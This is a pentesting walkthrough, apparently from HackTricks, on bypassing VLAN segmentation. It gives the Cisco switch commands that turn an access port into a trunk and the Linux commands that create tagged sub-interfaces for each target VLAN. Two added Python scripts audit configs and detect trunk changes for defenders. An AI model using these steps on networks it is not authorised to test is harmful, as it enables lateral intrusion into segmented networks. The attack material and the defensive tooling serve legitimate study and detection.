Lateral VLAN Segmentation Bypass

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

This page was copied from https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

If you have access to a switch that you are directly connected to, you can bypass VLAN segmentation within the network. Switch your port to trunk mode, create virtual (802.1Q tagged) sub-interfaces on your host with the IDs of the target VLANs, and configure an IP address on each of them. The address can be requested dynamically (DHCP) or configured statically; it depends on the case.

First you need to find out exactly which port you are connected to. You can read it from CDP messages, or you can search the switch's MAC address table for your own MAC address, filtering the output with "include".

If CDP is disabled, search the MAC address table for our MAC address instead.

SW1(config)# show mac address-table | include 0050.0000.0500

Before we switch to trunk mode, we need to list the existing VLANs and find out their identifiers. We will then assign these identifiers to sub-interfaces on our host; because the port is a trunk, we can reach any of these VLANs. By the way, the port we are connected to belongs to VLAN 10.

SW1# show vlan brief

Here we go. Enter interface configuration mode and go into trunk mode.

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk
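From the defender's side, the state that the three commands above leave behind is visible in the running-config, and a periodic audit catches it. The following is an added example, not code from the original article or from HackTricks: a hypothetical Python audit over a constructed running-config excerpt that flags trunk ports carrying every VLAN (no "switchport trunk allowed vlan" list), trunks that still negotiate DTP (no "switchport nonegotiate"), and ports with no explicit switchport mode. Interface names, descriptions and VLAN numbers in the sample are made up.

```python
"""Hypothetical audit of a Cisco IOS running-config for trunk exposure.

Added example, not from the page. It parses a constructed running-config
excerpt and flags the conditions the procedure above relies on: a port in
trunk mode that carries every VLAN, and ports left to DTP negotiation.
"""
import re

# Constructed sample running-config excerpt (interface names and VLANs made up).
SAMPLE_CONFIG = """\
!
interface GigabitEthernet0/1
 description uplink to SW2
 switchport trunk encapsulation dot1q
 switchport trunk allowed vlan 10,20
 switchport mode trunk
 switchport nonegotiate
!
interface GigabitEthernet0/2
 description user port
 switchport trunk encapsulation dot1q
 switchport mode trunk
!
interface GigabitEthernet0/3
 switchport access vlan 10
 switchport mode access
 switchport nonegotiate
!
interface GigabitEthernet0/4
 switchport access vlan 20
!
"""


def parse_interfaces(config: str) -> dict:
    """Map each 'interface <name>' block to its indented config lines."""
    interfaces = {}
    current = None
    for line in config.splitlines():
        m = re.match(r"^interface (\S+)", line)
        if m:
            current = m.group(1)
            interfaces[current] = []
        elif line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
        else:
            current = None  # '!' or any unindented line ends the block
    return interfaces


def audit_interface(name: str, lines: list) -> list:
    """Return a list of finding strings for one interface block."""
    findings = []
    modes = [l for l in lines if l.startswith("switchport mode ")]
    mode = modes[-1].split()[2] if modes else None
    if mode == "trunk":
        # Without an allowed-VLAN list a trunk carries every VLAN on the switch,
        # which is exactly what the bypass above relies on.
        if not any(l.startswith("switchport trunk allowed vlan") for l in lines):
            findings.append(f"{name}: trunk carries all VLANs (no 'switchport trunk allowed vlan')")
        if "switchport nonegotiate" not in lines:
            findings.append(f"{name}: trunk still sends DTP (no 'switchport nonegotiate')")
    elif mode is None:
        # Catalyst ports typically default to 'dynamic auto' (older models to
        # 'dynamic desirable'), so with no explicit mode the port is negotiable.
        findings.append(f"{name}: no explicit switchport mode (DTP default applies)")
    return findings


def audit_config(config: str) -> list:
    """Audit every interface block in a running-config."""
    findings = []
    for name, lines in parse_interfaces(config).items():
        findings.extend(audit_interface(name, lines))
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

Run against a real "show running-config" export, the script reports three findings for the sample above: two for GigabitEthernet0/2 (a user port turned into an unrestricted trunk) and one for GigabitEthernet0/4 (no explicit mode). The remediation each finding points at is the matching command: an explicit "switchport mode access" with "switchport nonegotiate" on user ports, and an explicit allowed-VLAN list on genuine uplinks.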

Connectivity is lost when the port switches to trunk mode, but the next steps restore it.

Create virtual sub-interfaces tagged with the VLAN IDs, then bring them up. (vconfig is the legacy 8021q tool; current Linux distributions create the same tagged sub-interfaces with ip link.)

~$ sudo vconfig add eth0 10
~$ sudo vconfig add eth0 20
~$ sudo vconfig add eth0 50
~$ sudo vconfig add eth0 60
~$ sudo ifconfig eth0.10 up
~$ sudo ifconfig eth0.20 up
~$ sudo ifconfig eth0.50 up
~$ sudo ifconfig eth0.60 up

Now request an address via DHCP. If that is not possible in your case, set the address statically.

~$ sudo dhclient -v eth0.10
~$ sudo dhclient -v eth0.20
~$ sudo dhclient -v eth0.50
~$ sudo dhclient -v eth0.60

Example of configuring a static IP address on an interface (VLAN 10):

~$ sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

To test the connection, I initiate ICMP requests to the default gateways for VLANs 10, 20, 50 and 60.

In the end, I bypassed VLAN segmentation and can reach any VLAN's network, which opens up the rest of the network for the next steps.
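The change that makes all of this possible, an access port being reconfigured as a trunk, is a configuration event the switch itself can log. The following is an added example, not code from the original article or from HackTricks: a hypothetical Python detector over constructed syslog lines modelled on IOS configuration logging (%PARSER-5-CFGLOG_LOGGEDCMD messages, produced when "archive / log config / logging enable" is set). It assumes the defender keeps an inventory of ports that are legitimately trunks; hostnames, usernames, ports and timestamps in the sample are made up.

```python
"""Hypothetical detection of trunk-mode changes in Cisco IOS syslog.

Added example, not from the page. Assumes the switch logs configuration
commands (IOS 'archive' / 'log config' feature, %PARSER-5-CFGLOG_LOGGEDCMD
messages) and that the defender keeps an inventory of ports that are
legitimately trunks. The log lines below are constructed, not captured.
"""
import re

# Assumed inventory: ports that are supposed to be trunks (constructed).
EXPECTED_TRUNK_PORTS = {"GigabitEthernet0/1"}

# Constructed syslog excerpt modelled on IOS config-logging output.
SAMPLE_LOG = """\
Jan 10 12:00:01 SW1 123: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.10.10.66)
Jan 10 12:00:03 SW1 124: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:interface GigabitEthernet 0/2
Jan 10 12:00:04 SW1 125: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:switchport trunk encapsulation dot1q
Jan 10 12:00:05 SW1 126: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:switchport mode trunk
Jan 10 12:00:06 SW1 127: %LINK-3-UPDOWN: Interface GigabitEthernet0/2, changed state to down
Jan 10 12:00:08 SW1 128: %LINK-3-UPDOWN: Interface GigabitEthernet0/2, changed state to up
Jan 10 12:01:00 SW1 129: %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:interface GigabitEthernet0/1
Jan 10 12:01:01 SW1 130: %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:switchport mode trunk
""".strip().splitlines()

CMD_RE = re.compile(r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(?P<user>\S+)\s+logged command:(?P<cmd>.+)$")
IFACE_RE = re.compile(r"^interface\s+(.+)$", re.IGNORECASE)
# 'dynamic' modes also make the port negotiable into a trunk via DTP.
TRUNK_RE = re.compile(r"^switchport\s+mode\s+(trunk|dynamic)\b", re.IGNORECASE)


def hostname_of(line: str) -> str:
    """Fourth whitespace field in the constructed 'Mon DD HH:MM:SS host seq: ...' layout."""
    return line.split()[3]


def detect_trunk_changes(lines, expected_trunks):
    """Return one alert per logged command that puts a port into trunk (or DTP-negotiable) mode.

    Config logging emits one message per command, so the most recent
    'interface ...' command seen on the same host is the context for the change.
    """
    alerts = []
    context = {}  # host -> interface currently being configured
    for line in lines:
        m = CMD_RE.search(line)
        if not m:
            continue
        host = hostname_of(line)
        user, cmd = m.group("user"), m.group("cmd").strip()
        im = IFACE_RE.match(cmd)
        if im:
            # Normalise 'GigabitEthernet 0/2' and 'GigabitEthernet0/2' to one form.
            context[host] = im.group(1).replace(" ", "")
            continue
        if TRUNK_RE.match(cmd):
            iface = context.get(host, "<unknown>")
            alerts.append({
                "host": host,
                "user": user,
                "interface": iface,
                "command": cmd,
                # A trunk on an inventoried uplink is expected; on any other port it
                # is the change the procedure above makes on an access port.
                "severity": "info" if iface in expected_trunks else "high",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_trunk_changes(SAMPLE_LOG, EXPECTED_TRUNK_PORTS):
        print(alert)
```

On the sample, the detector raises a high-severity alert for admin turning GigabitEthernet0/2 into a trunk and an informational one for the inventoried uplink GigabitEthernet0/1. Correlating the high alert with the %LINK-3-UPDOWN flap that follows it (the connectivity loss mentioned above) and with the %SYS-5-CONFIG_I source address gives the responder the who, where and when in one place.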
